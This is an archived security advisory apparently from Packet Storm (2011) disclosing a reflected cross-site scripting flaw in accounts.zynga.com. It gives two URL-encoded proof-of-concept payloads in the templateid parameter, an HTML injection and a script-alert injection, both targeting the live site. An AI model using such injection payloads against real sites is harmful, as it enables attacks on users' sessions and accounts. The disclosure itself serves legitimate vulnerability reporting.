what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Zynga Cross Site Scripting

Zynga Cross Site Scripting
Posted Aug 2, 2011
Authored by r007k17-w

The accounts.zynga.com site suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | cb844ad91bec5e440dbecccfc1b6571b8785726efc82a33375e8e1d1399bd7c6

Zynga Cross Site Scripting

Change Mirror Download
        _______  ________________ __    _____________
_______ \ _ \ \ _ \______ \ | _/_ \______ \ __ _ __
\_ __ \/ /_\ \/ /_\ \ / / |/ /| | / / ______ \ \/ \/ /
| | \/\ \_/ \ \_/ \/ /| < | | / / /_____/ \ /
|__| \_____ /\_____ /____/ |__|_ \|___| /____/ \/\_/
\/ \/ \/
-------------------------------------------------------------------------------------------------------------------------------------------------

Title: Zynga (accounts)Cross site scripting vulnerability
vendor: www.zynga.com
Author: Raghavendra Karthik D (r007k17-w)
Email: n4gb07@gmail.com
My blog: http://shadowrootkit.wordpress.com/
Google Dork:© 2011 Zynga, Inc

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

* Cross Site Scripting vulnerability

Demo:
1.HTML injection:

http://accounts.zynga.com/?game=&unsub=11046&templateid=%22%3E%3Cfont%20size=22%20name=calibri%3EXSS%20BUG%20DETECTED!!%20%3C/font%3E

2.JavaScript injection:

http://accounts.zynga.com/?game=&unsub=11046&templateid=%22%3E%3Cscript%3Ealert%28%22XSSed_by_Raghavendra_Karthik_D%22%29%3C/script%3E
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
gr33t1ngs to s1d3-3ff3cts and 3psilonlambda and all my friends.
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close